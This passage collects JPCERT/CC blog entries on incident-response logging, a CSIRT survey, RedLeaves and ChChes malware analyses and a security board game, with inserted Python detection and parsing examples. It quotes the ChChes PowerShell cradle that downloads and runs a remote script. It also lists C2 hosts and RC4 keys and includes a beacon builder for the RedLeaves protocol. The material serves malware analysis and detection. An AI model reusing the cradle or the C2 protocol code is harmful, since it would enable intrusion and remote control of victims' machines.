This entry introduces an overview of the report.

Intended Audience

This report is designed for technical staff, including those responsible for the initial investigation of incidents. Readers capable of examining event logs and registry entries can understand the contents even without forensic software or knowledge of forensics.

Tools and Commands

44 typical tools and commands are featured in the report (as listed in Appendix A), based on what JPCERT/CC has seen in multiple incident cases. Since these tools and commands are used by multiple attackers, analysts are likely to encounter some of them during incident investigation.

Need for Detailed Logs

Under the default configuration of Windows, many of these tools and commands are not logged. In order to investigate what attackers did during an incident, preparation for log retention is necessary. The report describes how to record tool and command executions by setting audit policy and installing Sysmon. Other than the methods explained in the report, it is also possible to collect such logs with audit applications or EDR products.

Way Forward

We are planning to examine other tools and commands as well. In addition to event logs and registry entries, we will also look into forensic artifacts such as MFT and journal files.

We welcome any feedback from you at global-cc [at] jpcert.or.jp.

- Shusei Tomonaga

(Translated by Yukako Uchida)

Appendix A: Examined Commands and Tools
Table 1: List of Examined Commands and Tools (attacker's purpose of using the tool, followed by the tools)
  • Command execution: PsExec, wmic, PowerShell, wmiexec.vbs, BeginX, winrm, at, winrs, BITS
  • Obtaining password hash: PWDump7, Quarks PwDump, mimikatz, WCE, gsecdump, lslsass, Find-GPOPasswords.ps1, Mail PassView, WebBrowserPassView, Remote Desktop PassView, PWDumpX
  • Malicious communication relay (packet tunneling): Htran, Fake wpad
  • Remote login: RDP
  • Pass-the-hash, Pass-the-ticket: WCE, mimikatz
  • Escalation to SYSTEM privilege: MS14-058 Exploit, MS15-078 Exploit
  • Privilege escalation: SDB UAC Bypass
  • Capturing domain administrator rights account: MS14-068 Exploit, Golden Ticket (mimikatz), Silver Ticket (mimikatz)
  • Capturing Active Directory database (creating a domain administrator user or adding it to an administrator group): ntdsutil, vssadmin
  • Adding or deleting a user group: net user
  • File sharing: net use, net share, icacls
  • Deleting evidence: sdelete, timestomp
  • Deleting event log: wevtutil
  • Obtaining account information: csvde, ldifde, dsquery

May 12, 2017

Fact-finding Report on the Establishment and Operation of CSIRTs in Japan

Hello, this is Misaki Kimura from Watch and Warning Group.

JPCERT/CC conducted the “Survey on the Establishment and Operation of CSIRTs in Japan” at the end of 2015. Following the Japanese report released in 2016, we have now released the English version of the report on the JPCERT/CC website to share the outcomes with information security community members around the globe. Although social composition, culture, organizational structure and so on may differ in each economy, we hope that this document serves as a useful reference for establishing a CSIRT or for comparing the situation with that of organizations overseas.

This blog entry covers an executive summary of the report.

Background of the survey

Cyber attacks in recent years have become so diverse in terms of their aims, targets and TTPs (Tactics, Techniques and Procedures) that their impact can be large enough to shake the foundation of a business. One approach that is drawing attention is to establish a Computer Security Incident Response Team (CSIRT) to serve as the linchpin of an organization’s handling of security incidents. The Cybersecurity Management Guidelines released by the Ministry of Economy, Trade and Industry in December 2015 also referred to the need to establish CSIRTs, and this has been boosting the number of CSIRTs in Japan.

Cyber security communities, including the CSIRT community, are quite active in Japan. Nippon CSIRT Association (NCA), which has 232 member organizations (as of May 2017), is the venue for local CSIRTs to come together for information sharing and joint activities. JPCERT/CC conducted the survey targeting 66 organizations that belong to NCA, with the aim of assisting those who wish to establish a new CSIRT by compiling the facts of CSIRT activities in various local organizations. The survey took place in December 2015, by means of a questionnaire and interviews, covering questions on organizational structure, scale, functions, policies and various other aspects of CSIRTs. Below we introduce some interesting findings described in the report.

Items to be defined upon establishing a CSIRT

Business activities, scales, department structures, and anticipated risks differ according to the organization. For this reason, based on the results of the survey, the following six items were identified as matters that organizations should define upon establishing an internal CSIRT.

  • Scope of services provided by CSIRTs
  • Authority granted to CSIRTs
  • Deployment and members of CSIRTs
  • Point(s) of contact (PoC)
  • Reporting structure to effectively communicate the effects of CSIRT activities within the company
  • Periodic review of CSIRT activities

Among these, I would like to highlight a few findings of the survey that are considered noteworthy for organizations overseas, as follows:

Scope of services provided by CSIRTs

A CSIRT is required to receive, review and respond to various incident reports. Therefore, the scope of its services, such as contents, targets and range of responsibility, needs to be considered.

NCA categorizes services offered by CSIRTs roughly into three types: reactive services, proactive services, and security quality control services. Within these three categories, the survey results identified the main services provided by CSIRTs as follows:

 - Reactive services
  • More than 80% answered that "Incident handling", "Issuing security alerts", "Log Analysis" and "Vulnerability handling" are provided to respond promptly in the event of an incident
 - Proactive services
  • More than 80% answered that "Security warning announcement" is provided ahead of an incident
  • Nearly 70% answered that "Provision of security related information" and "Intrusion detection" are provided to monitor for signs of an attack
 - Security quality control services
  • More than 70% answered that "Conducting awareness raising activity", "Organizing educational programs" and "Consulting security related issues" are provided as services aimed at increasing the knowledge and skills needed to respond to cyber security issues

In some CSIRTs, all of these services are provided whereas some CSIRTs only provide one or two of those. It is not the variety of services they provide that matters to a CSIRT, but the capability to provide the kinds of services that the organization needs.

The results also showed that about 60% of the organizations have documented their service definition, and over 80% have defined and documented security policies approved by the management.

Authority granted to CSIRTs

In responding to security incidents, an organization needs to make appropriate and timely decisions. While CSIRTs are in a position to assist departments or individuals in decision-making, it is important to understand how far a CSIRT's authority extends.

For example, when a system needs to be suspended to avoid risk during an urgent incident, about 12% of the CSIRTs answered that they themselves have the authority to order the system to be stopped, while 85% answered that they do not have that authority but are in a position to advise on the decision.

Figure 1. Authority of the CSIRT in the event of an incident

These results show that not many CSIRTs hold strong decision-making authority. However, some CSIRTs answered in the interview that they do not necessarily need authority as strong as the power to suspend systems in order to function effectively. What matters to them is how effectively the CSIRT can collaborate with the management level to expedite accurate and rapid business decisions.

Incident handling and Escalation

In case of an incident, an escalation process must be clearly defined, documented and officially approved to ensure that the incident is directed to the appropriate departments. The results show that 74% of the CSIRTs have such a process in place towards management, 52% towards the public relations department, and 50% towards the legal department. This indicates that CSIRTs work closely with the management level in case of an incident, but that there is room for improvement with other related departments.

Information Sharing

It is essential for CSIRTs to share information and cooperate, not only with other departments within the organization but also with external partners such as other CSIRTs. Joining an information sharing framework allows the team to obtain threat information and respond to it effectively, which ultimately helps protect the organization.

The results show that all the survey respondents participate in more than one information sharing framework. Specific frameworks they join include WAISE (Watch and Warning Analysis Information for Security Experts, operated by JPCERT/CC), CCI (Counter Cyber Intelligence, operated by the National Police Agency), working groups of Financials ISAC Japan, J-CSIP (Initiative for Cyber Security Information sharing Partnership of Japan, operated by Information-technology Promotion Agency, Japan) and so on.

When asked about the primary methods of expression used for sharing information, all the respondents selected text format. At the time the survey was conducted (December 2015), some CSIRTs had already implemented STIX/TAXII, a globally recognized standard for sharing incident information. The protocol has been gradually adopted by an increasing number of CSIRTs in the two years since the survey.

Figure 2. Primary method(s) of expression used for sharing information

Information sharing and collaboration require an investment of time and technical resources, but the benefits far outweigh the costs. Some of the respondents said in the interview that information sharing with other CSIRTs enables them to acquire knowledge and exchange insights, which helps keep their CSIRT members motivated. Other interviewees pointed out the importance of building trust relationships with other CSIRTs, and said that participating in NCA and other community activities had given them opportunities to rethink how they interact with their own organizations.

Conclusion

The report points to six items that should be defined when establishing an internal CSIRT. However, fulfilling all of these conditions does not by itself guarantee that the CSIRT's activities will live up to the expectations of the organization. For an internal CSIRT to function effectively, it is extremely important that the team shares information and cooperates with other departments within the organization and with other CSIRTs. In addition, through day-to-day operations, including exercises and training as well as responding to actual incidents, we believe that newly established CSIRTs develop into a trusted and indispensable part of the organization.

The full report can be downloaded here:

https://www.jpcert.or.jp/english/pub/sr/2015_CSIRT-survey.html

- Misaki Kimura

May 02, 2017

Volatility Plugin for Detecting RedLeaves Malware

Our previous blog entry introduced details of RedLeaves, a type of malware used for targeted attacks. Since then, we have seen reports, including those from US-CERT, that Managed Service Providers (MSPs) have been targeted [1] [2]. The US-CERT report identifies instances where RedLeaves was found only in memory, with no on-disk evidence, because the malware deletes its files after infection.

To verify an infection without on-disk evidence, the investigation needs to rely on a memory dump or on logs (e.g. proxy logs) stored on network devices.

This article introduces a tool to detect RedLeaves in the memory.

It is available on GitHub:

JPCERTCC/aa-tools · GitHub

https://github.com/JPCERTCC/aa-tools/blob/master/redleavesscan.py

Tool Details

The tool works as a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. redleavesscan.py has the following functions:

  • redleavesscan: Detect RedLeaves in memory images
  • redleavesconfig: Detect RedLeaves in memory images and extract malware configuration

To run the tool, save redleavesscan.py in the "contrib/plugins/malware" folder within Volatility, and execute the following command:


$ python vol.py [redleavesscan|redleavesconfig] -f <memory.image> --profile=<profile>

Figure 1 shows an example output of redleavesscan. It lists the detected process name (Name), process ID (PID) and the name of the detected malware (Malware Name).

Figure 1: Output of redleavesscan

Figure 2 shows an example output of redleavesconfig. For details about RedLeaves configuration, please see our previous blog entry.

Figure 2: Output of redleavesconfig

In closing

It has been confirmed that the attacker group who uses RedLeaves also uses PlugX. To detect PlugX in memory, please use the Volatility plugin released by Airbus [3].

- Shusei Tomonaga

(Translated by Yukako Uchida)


Reference:

[1] US-CERT: Intrusions Affecting Multiple Victims Across Multiple Sectors

https://www.us-cert.gov/sites/default/files/publications/IR-ALERT-MED-17-093-01C-Intrusions_Affecting_Multiple_Victims_Across_Multiple_Sectors.pdf

[2] PwC: Operation Cloud Hopper

https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html

[3] Volatility plugin for PlugX

https://bitbucket.org/cybertools/volatility_plugins/wiki/Home

Apr 03, 2017

RedLeaves - Malware Based on Open Source RAT

Hi again, this is Shusei Tomonaga from the Analysis Center.

Since around October 2016, JPCERT/CC has been confirming information leakage and other damage caused by the malware ‘RedLeaves’. It is a new type of malware that has been observed since 2016, attached to targeted emails.

This entry introduces details of RedLeaves and results of our analysis including its relation to PlugX, and a tool which is used as the base of this malware.

How RedLeaves runs

RedLeaves is injected into the Internet Explorer process through the following steps (Figure 1):

Figure 1: Flow of events until RedLeaves runs

Malware samples that JPCERT/CC has analysed create the following three files in the %TEMP% folder and then execute the legitimate application:

  • A legitimate application (EXE file): a signed, executable file which reads a DLL file located in the same folder
  • A Loader (DLL file): a malicious DLL file which is loaded by the legitimate application
  • Encoded RedLeaves (DATA file): Encoded data which is read by the loader

When the legitimate application is executed, it loads the loader located in the same folder through DLL Hijacking (DLL preloading).

The loader, running inside the legitimate application, reads and decodes the encoded RedLeaves and then executes it. RedLeaves launches a process (Internet Explorer, depending on its configuration) and injects itself into it. RedLeaves then runs inside the injected process. The following section explains the behaviour of the injected RedLeaves.

Behaviour of RedLeaves

RedLeaves communicates with specific sites by HTTP or by its own custom protocol and executes the commands it receives. Figure 2 is the PE header of the injected RedLeaves: the signatures “MZ” and “PE” have been replaced with “0xFF 0xFF”.

Figure 2: Injected RedLeaves
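The overwritten signatures are exactly what a memory scanner such as the redleavesscan plugin from the May 02 entry can key on. As an added example (not JPCERT/CC's plugin and not RedLeaves code), the following standalone Python scans a raw buffer for a PE header whose "MZ" and "PE\0\0" were replaced by 0xFF bytes. It assumes the remainder of the header (e_lfanew, COFF header, optional-header magic) is intact, builds its own constructed sample header rather than using a real dump, and includes a helper that puts the signatures back so the dumped image can be fed to an ordinary PE parser:

```python
"""Heuristic scan for a RedLeaves-style in-memory PE image whose "MZ" and
"PE\0\0" signatures were overwritten with 0xFF bytes.  Added example (not
JPCERT/CC's redleavesscan plugin): it checks a raw buffer instead of walking
process memory through Volatility, and assumes the rest of the PE header
(e_lfanew, COFF header, optional-header magic) is left intact."""
import struct

MACHINES = (0x014C, 0x8664)      # IMAGE_FILE_MACHINE_I386 / AMD64
OPT_MAGICS = (0x10B, 0x20B)      # PE32 / PE32+


def find_patched_pe(buf: bytes) -> list:
    """Return offsets of candidate headers: FF FF where "MZ" should be, a sane
    e_lfanew at +0x3C, FF FF 00 00 where "PE\0\0" should be, and a plausible
    COFF header behind it.  The extra checks matter because runs of 0xFF are
    common in memory (fills, -1 values) and would otherwise flood the result."""
    hits = []
    i = buf.find(b"\xff\xff")
    while i != -1:
        if i + 0x40 <= len(buf):
            e_lfanew = struct.unpack_from("<I", buf, i + 0x3C)[0]
            pe = i + e_lfanew
            if 0x40 <= e_lfanew <= 0x400 and pe + 26 <= len(buf) \
                    and buf[pe:pe + 4] == b"\xff\xff\x00\x00":
                machine, nsections = struct.unpack_from("<HH", buf, pe + 4)
                opt_magic = struct.unpack_from("<H", buf, pe + 24)[0]
                if machine in MACHINES and 1 <= nsections <= 96 and opt_magic in OPT_MAGICS:
                    hits.append(i)
        i = buf.find(b"\xff\xff", i + 1)
    return hits


def restore_signatures(buf: bytes, offset: int) -> bytes:
    """Put "MZ" and "PE\0\0" back so the dumped image parses as a normal PE."""
    out = bytearray(buf)
    out[offset:offset + 2] = b"MZ"
    pe = offset + struct.unpack_from("<I", out, offset + 0x3C)[0]
    out[pe:pe + 4] = b"PE\x00\x00"
    return bytes(out)


def make_sample_image(patched: bool = True) -> bytes:
    """Constructed 0xC0-byte header (not a real sample): DOS header with
    e_lfanew = 0x80, then an i386 COFF header with 3 sections and a PE32
    optional-header magic.  patched=True applies the RedLeaves-style overwrite."""
    img = bytearray(0xC0)
    img[0:2] = b"\xff\xff" if patched else b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                       # e_lfanew
    img[0x80:0x84] = b"\xff\xff\x00\x00" if patched else b"PE\x00\x00"
    struct.pack_into("<HH", img, 0x84, 0x014C, 3)                 # Machine, NumberOfSections
    struct.pack_into("<H", img, 0x94, 0xE0)                       # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", img, 0x98, 0x10B)                      # optional header Magic
    return bytes(img)


if __name__ == "__main__":
    # Constructed "memory": a run of 0xFF, zero padding, the patched image, more zeros.
    mem = b"\xff" * 16 + b"\x00" * 100 + make_sample_image() + b"\x00" * 64
    for off in find_patched_pe(mem):
        print(f"patched PE header at offset {off:#x}")
```

In a real investigation the buffer would be each VAD region of the suspected process (Internet Explorer, per the configuration), and the offsets reported are where a dump and signature restoration should start.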

The injected RedLeaves connects to command and control (C&C) servers by HTTP POST request or its custom protocol. Destination hosts and communication methods are specified in its configuration. Please refer to Appendix A for more information.

Below is an example of the HTTP POST request. Tables B-1 and B-2 in Appendix B describe the format of the data sent.

POST /YJCk8Di/index.php
Connection: Keep-Alive
Accept: */*
Content-Length: 140
Host: 67.205.132.17:443

[Data]

The data is encrypted with RC4 (the key is stored in the configuration) and contains the following:

__msgid=23.__serial=0.clientid=A58D72524B51AA4DBBB70431BD3DBBE9
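As an added example (not JPCERT/CC's or RedLeaves' own code), the following Python builds the HTTP POST body of Table B-1 and the custom-protocol frame of Table B-2 from this decrypted string, parses them back, and splits the decrypted fields of Table B-3. The post does not state byte order, how the XOR with the first four key bytes is applied, the "fixed value", or what the custom protocol's "Length" field covers; the assumptions made for each are labelled in the code. The key and the decrypted text come from this post; the server id and nonce are constructed:

```python
"""Build and parse RedLeaves beacon bodies following Tables B-1 and B-2 in
Appendix B.  Added example, not JPCERT/CC code.  Assumptions not stated in the
post: the 4-byte fields are little-endian; "XOR encoded with the first 4 bytes
of the RC4 key" means a byte-wise XOR of those 4 bytes; the "fixed value"
fields are written as 0; and the custom protocol's "Length" at 0x08 covers
everything after the 12-byte outer header."""
import re
import struct

FIXED_VALUE = 0   # placeholder: the post only says "fixed value"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA).  Encrypt and decrypt are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor4(value: int, key: bytes) -> bytes:
    """32-bit little-endian value XORed byte-wise with key[0:4]."""
    return bytes(b ^ k for b, k in zip(struct.pack("<I", value), key[:4]))


def unxor4(blob: bytes, key: bytes) -> int:
    return struct.unpack("<I", bytes(b ^ k for b, k in zip(blob, key[:4])))[0]


def build_http_body(key: bytes, server_id: int, plaintext: bytes) -> bytes:
    """Table B-1: [len^key][server_id^key][fixed][RC4(plaintext)]."""
    enc = rc4(key, plaintext)
    return xor4(len(enc), key) + xor4(server_id, key) + struct.pack("<I", FIXED_VALUE) + enc


def parse_http_body(key: bytes, body: bytes):
    """Inverse of build_http_body; returns (server_id, plaintext)."""
    if len(body) < 12:
        raise ValueError("body shorter than the 12-byte header")
    length = unxor4(body[0:4], key)
    server_id = unxor4(body[4:8], key)
    enc = body[12:12 + length]
    if len(enc) != length:
        raise ValueError("declared length exceeds body")   # wrong key or truncated capture
    return server_id, rc4(key, enc)


def build_custom_frame(key: bytes, server_id: int, plaintext: bytes, nonce: int) -> bytes:
    """Table B-2: a 12-byte [random][fixed][length] header in front of the B-1 layout."""
    inner = build_http_body(key, server_id, plaintext)
    return struct.pack("<III", nonce, FIXED_VALUE, len(inner)) + inner


def parse_custom_frame(key: bytes, frame: bytes):
    """Strip the outer header and reuse the HTTP parser for the rest."""
    _nonce, _fixed, length = struct.unpack_from("<III", frame, 0)
    return parse_http_body(key, frame[12:12 + length])


def parse_fields(plaintext: bytes) -> dict:
    """Split the decrypted "key=value.key=value" string of Table B-3.  Assumes
    values themselves contain no '.', which holds for the sample in the post."""
    return dict(re.findall(r"(\w+)=([^.]*)", plaintext.decode("ascii", "replace")))


if __name__ == "__main__":
    # Constructed beacon using the decrypted text and one of the RC4 keys from Appendix A.
    key = b"Lucky123"
    msg = b"__msgid=23.__serial=0.clientid=A58D72524B51AA4DBBB70431BD3DBBE9"
    body = build_http_body(key, 1, msg)
    print(parse_fields(parse_http_body(key, body)[1]))
```

Note that the two tables share their layout from the RC4 length field onward, so one parser serves both once the 12-byte outer header of the custom protocol is removed. The sample request above carries Content-Length 140, so a real body holds more than the three fields quoted here; with a wrong key the decoded length is garbage and the parser usually fails the length check, which is a cheap way to test candidate keys from Appendix A against a capture.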

The data received from the C&C servers contain commands. Depending on the received commands, RedLeaves executes the following functions (Please see Table B-3 in Appendix B for the details of received data):

  • Operation on files
  • Execute arbitrary shell commands
  • Configure communication methods
  • Send drive information
  • Send system information
  • Upload/download files
  • Screen capture
  • Execute proxy function

Base of RedLeaves’s Code

JPCERT/CC analysed RedLeaves and confirmed that its code has a lot in common with the source code of Trochilus [1], a RAT (Remote Administration Tool) available on GitHub. Figure 3 shows part of the code that processes received data. It clearly handles the same fields as those listed in Table B-3 in Appendix B.

Figure 3: Part of Trochilus’s source code

It is presumed that RedLeaves is built on top of Trochilus’s source code, rather than from scratch.

Relation to PlugX

Comparing the RedLeaves samples that JPCERT/CC has observed with PlugX, which certain attacker groups have used in the past, we identified similar code in some routines. Below is the sequence of instructions observed when each sample creates its three files (a legitimate application, a loader, and encoded RedLeaves or PlugX).

Figure 4: Comparison of file creation process

Furthermore, the process in which the loader decodes the encoded data (encoded RedLeaves or PlugX) is similar.

Figure 5: Comparison of file decode process

JPCERT/CC has also confirmed that some of the RedLeaves and PlugX samples that share the above code also communicate with common hosts. From this observation, it is presumed that the attacker group using RedLeaves may have used PlugX before.

Summary

RedLeaves is a new type of malware being observed since 2016 in attachments to targeted emails. Attacks using this malware may continue.

The hash values of the samples introduced here are listed in Appendix C. Some of the RedLeaves’ destination hosts that JPCERT/CC has confirmed are also listed in Appendix D. Please check your devices for any suspicious communication with such hosts.

- Shusei Tomonaga

(Translated by Yukako Uchida)


Reference

[1] Trochilus: A fast&free windows remote administration Tool

https://github.com/5loyd/trochilus

Appendix A: Configuration information

Table A: List of configuration information

Offset  Description         Remarks
0x000   Destination 1
0x040   Destination 2
0x080   Destination 3
0x0C0   Port number
0x1D0   Communication mode  1=TCP, 2=HTTP, 3=HTTPS, 4=TCP and HTTP
0x1E4   ID
0x500   Mutex
0x726   Injection process
0x82A   RC4 key             Used for encrypting communication

RC4 key examples:

  • Lucky123
  • problems
  • 20161213
  • john1234
  • minasawa

Appendix B: Communicated data

Table B-1: Format of data sent through HTTP POST request

Offset  Length  Contents
0x00    4       Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)
0x04    4       Server id (XOR encoded with the first 4 bytes of the RC4 key)
0x08    4       Fixed value
0x0C    -       Data encrypted with RC4

Table B-2: Format of data sent through its custom protocol

Offset  Length  Contents
0x00    4       Random numerical value
0x04    4       Fixed value
0x08    4       Length
0x0C    4       Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)
0x10    4       Server id (XOR encoded with the first 4 bytes of the RC4 key)
0x14    4       Fixed value
0x18    -       Data encrypted with RC4

Table B-3: Contents in received data

String    Type        Contents
__msgid   Numeric     Command
__serial  Numeric
__upt     true, etc.  Whether the command is executed by a thread
__data    data        Command parameter, etc.

Appendix C: SHA-256 hash values of the samples

RedLeaves

  • 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481

PlugX

  • fcccc611730474775ff1cfd4c60481deef586f01191348b07d7a143d174a07b0

Appendix D: Communication destination hosts
  • mailowl.jkub.com
  • windowsupdates.itemdb.com
  • microsoftstores.itemdb.com
  • 67.205.132.17
  • 144.168.45.116

Mar 28, 2017

Board game on Cyber Security for Awareness Raising

Hi this is Sho Aoki from Watch and Warning Group.

Have you ever tried “game-based learning”?

Learning through games is useful: it is not only fun and easy but also provides opportunities for thinking, and it has been widely applied for educational purposes. In the area of cyber security as well, security vendors have released board games that are played at schools and companies.

Today I would like to introduce “SEC WEREWOLF”.

Board game package

This board game was released by the Japan Network Security Association (JNSA) [1], an NPO consisting of information security related organizations (mainly vendors) in Japan, whose aim is to raise awareness and provide information security solutions through various activities. One of its working group activities is to promote game-based learning, and this board game was developed there. JPCERT/CC is also part of this working group.

“SEC WEREWOLF” is a board game based on a famous party game “Werewolf” (also known as “Mafia”), which is a communication type game between a group of “villagers” and “werewolves” who attack villagers. Players probe other players in an attempt to find enemies to eliminate. In “SEC WEREWOLF”, “villagers” work as “CSIRT members” in an organisation, while “werewolves” are the evils in the organisation who are engaged in corruption.

STORY

“Corrupt workers” have been stealing confidential information from their organisation with the help of “black hat hackers” and profiting from it. However, the management finds out about the malicious activity. The “corrupt workers”, who have been dissatisfied with the company's treatment of them, try to shift the blame onto other employees and get them fired. A CSIRT is launched to restore a peaceful workplace and deal with the issue, with the aim of getting rid of the corrupt workers.

HOW TO PLAY (Overview)

  1. Players pick a role card that decides which team they belong to (CSIRT or attackers)
  2. All the players talk, without disclosing their roles, to work out who the “corrupt workers” are. The “corrupt workers” also pretend to be CSIRT members.
  3. At the end of the turn, based on the conversation, each player points to the person they think is a “corrupt worker”. The person with the highest number of votes is dismissed from the game. The “corrupt workers” secretly put the blame on a CSIRT member to get them out of the game.

Process 2 and 3 will be repeated until either of the following conditions is met:

a) All the “corrupt workers” are dismissed (CSIRT wins)

b) The number of remaining “corrupt workers” becomes the same as CSIRT members (“Corrupt workers” win)

Among board games on cyber security, “SEC WEREWOLF” is relatively easy and suitable for beginners, since it has few prerequisites. The game presents the concept of cyber security and the roles within a CSIRT (some role cards have different technical skills). Furthermore, it comes with post-game materials for learning about internal fraud by looking back at how a “corrupt worker” behaved and what the CSIRT members needed to do about it. It is also good material for learning what kind of personnel a CSIRT needs to have.

The “Fraud Triangle”, a model of internal fraud proposed by D. R. Cressey, a criminologist from the US, suggests that internal fraud can occur when three factors are present: perceived unshareable financial need, perceived opportunity and rationalisation [2].

The post-game material provides a review of the game from the above three perspectives. Also, by looking back at the conversation that occurred during the game, the facilitator can guide participants to further discuss lessons learned from the game. Consequently, they can consider what sort of environment they need to establish/maintain to keep their workplace from such fraud.

Facilitator explaining about internal fraud based on the triangle

The working group designed this game for people who are not familiar with cyber security. It is often said that it is difficult to get employees' attention on cyber security operations unless they are actually involved. Given that cyber security is now a hot topic not only for organisations but also for individuals, it is important to raise the security awareness of a wide range of employees and users. This board game provides a good opportunity to familiarise the players with the concept of cyber security and the role of CSIRTs.

Role cards
Trial at JPCERT/CC

To fully utilise this game, it is also important to develop game facilitators. Besides just leading the game, this role is important in presenting the know-how of cyber security, how CSIRTs work and how a CSIRT should be staffed.

There is another board game about initial response to cyber incidents, which the Working Group is planning to release in the coming Fiscal Year. JPCERT/CC is willing to assist awareness raising activities through the Working Group.

- Sho Aoki

Translated by Yukako Uchida


Reference:

[1] About JNSA

http://www.jnsa.org/en/aboutus/index.html

[2] The Fraud Triangle – The Association of Certified Fraud Examiners

http://www.acfe.com/fraud-triangle.aspx

Mar 01, 2017

Malware Leveraging PowerSploit

Hi again, this is Shusei Tomonaga from the Analysis Center.

In this article, I would like to share our finding that ChChes (introduced in a previous article) leverages PowerSploit [1], an open source tool, for infection.

Flow of ChChes Infection

The samples that JPCERT/CC confirmed this time infect machines by means of shortcut files. The flow of events from a victim opening the shortcut file until the machine is infected is illustrated in Figure 1.

Figure 1: Flow of events from opening a shortcut file to ChChes infection

When the shortcut file is opened, a file containing PowerShell script is downloaded from an external server and then executed. Next, ChChes code (version 1.6.4) contained in the PowerShell script is injected into powershell.exe and executed. The detailed behaviour in each phase is described below.

Behaviour after the shortcut file is opened

When the shortcut file is opened, the following PowerShell script contained in the file is executed.

powershell.exe -nop -w hidden -exec bypass  -enc JAAyAD0AJwAtAG4Abw ~omitted~

The argument after -enc is the script encoded as Base64 (of its UTF-16LE text, which is what powershell.exe's -EncodedCommand expects). Below is the decoded script:

$2='-nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString(''https://goo.gl/cpT1NW'')"';if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2";}else{iex "& powershell $2";}

Executing the above script downloads a file containing a PowerShell script from the specified URL. The downloaded script is loaded and executed in the 32-bit powershell.exe (syswow64\WindowsPowerShell\v1.0\powershell). The reason it is executed in 32-bit is presumably that the ChChes assembly code contained in the PowerShell script is not compatible with a 64-bit environment.

Details of the Downloaded PowerShell Script

The downloaded PowerShell script is partially copied from PowerSploit (Invoke-Shellcode.ps1). PowerSploit is a collection of PowerShell modules for post-exploitation used in penetration tests; Invoke-Shellcode injects shellcode into a process.

When the downloaded PowerShell script is executed, it creates document files from data embedded in the script, stores them in the %TEMP% folder and displays them. We have seen different types of documents shown, including Excel and Word documents.

Next, the ChChes code contained in the PowerShell script is injected into powershell.exe. The injected ChChes receives commands and modules from C2 servers as explained in the previous blog post. Neither the PowerShell script nor the injected ChChes is saved as a file on the infected machine; ChChes itself exists only in memory.

Figure 2 is a part of the PowerShell script.

Figure 2: Downloaded PowerShell script

Confirming Attack Traces through Event Logs

In environments where PowerShell v5.0 is installed (including Windows 10), PowerShell scripts downloaded from remote servers are recorded in the event log (Microsoft-Windows-PowerShell/Operational, Event ID 4104) under the default settings, as shown in Figure 3. When you investigate, please check whether your logs contain such records.

Figure 3: Contents recorded in Event Logs

Such logs can also be obtained with PowerShell v4.0 (the default version on Windows 8.1) by enabling the following Group Policy:

  • Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging
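Whether the launcher command line comes from a script block record, a process-creation event (4688) or a Sysmon log, the first triage step is the decoding described above and a check for the traits this launcher shows (hidden window, policy bypass, an IEX DownloadString cradle, the 32-bit re-spawn). As an added example, not JPCERT/CC code, the following Python does both: the accepted flag spellings and the indicator patterns are this example's own choices, the embedded first-stage script is the one quoted (decoded) earlier in this post, and the command lines it runs over are constructed:

```python
"""Decode PowerShell -EncodedCommand arguments and triage command lines (for
example from Event ID 4688 or Sysmon process-creation records) for the
launcher traits described in this post.  Added example, not JPCERT/CC code.
Assumptions: the indicator regexes and the accepted flag spellings are this
example's own choices, and the first-stage script embedded below is the one
quoted (decoded) in the post."""
import base64
import re

CHCHES_STAGE1 = (
    r'''$2='-nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient)'''
    r'''.DownloadString(''https://goo.gl/cpT1NW'')"';if([IntPtr]::Size -eq 8)'''
    r'''{$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";'''
    r'''iex "& $3 $2";}else{iex "& powershell $2";}'''
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; "-ec" is
# included as well (assumed accepted by recent versions).
ACCEPTED_FLAGS = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}
ENC_ARG = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)

INDICATORS = {
    "hidden-window":   r"-w[a-z]*\s+hidden",
    "policy-bypass":   r"-ex[a-z]*\s+bypass",
    "no-profile":      r"-nop[a-z]*",
    "download-cradle": r"(?:iex|invoke-expression).*downloadstring|downloadstring.*(?:iex|invoke-expression)",
    "wow64-respawn":   r"syswow64\\windowspowershell",
}


def encode_command(script: str) -> str:
    """What the attacker does: UTF-16LE, then Base64, for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script behind -enc/-e/-EncodedCommand, or None.
    Missing padding is tolerated and a truncated trailing byte is dropped, so
    fragments such as the one in the post still yield their readable prefix."""
    for m in ENC_ARG.finditer(cmdline):
        flag, payload = m.group(1).lower(), m.group(2)
        if flag not in ACCEPTED_FLAGS:
            continue                       # e.g. "-exec bypass" is not the encoded script
        payload += "=" * (-len(payload) % 4)
        try:
            return base64.b64decode(payload).decode("utf-16-le", "ignore")
        except ValueError:
            return None
    return None


def triage(cmdline: str) -> dict:
    """Decode (if encoded) and list which indicators fire on the raw line plus
    the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    fired = [name for name, pat in INDICATORS.items() if re.search(pat, haystack, re.I)]
    return {"decoded": decoded, "indicators": fired}


def triage_log(lines) -> list:
    """Return (line, result) for every command line that trips at least one indicator."""
    out = []
    for line in lines:
        r = triage(line)
        if r["indicators"]:
            out.append((line, r))
    return out


if __name__ == "__main__":
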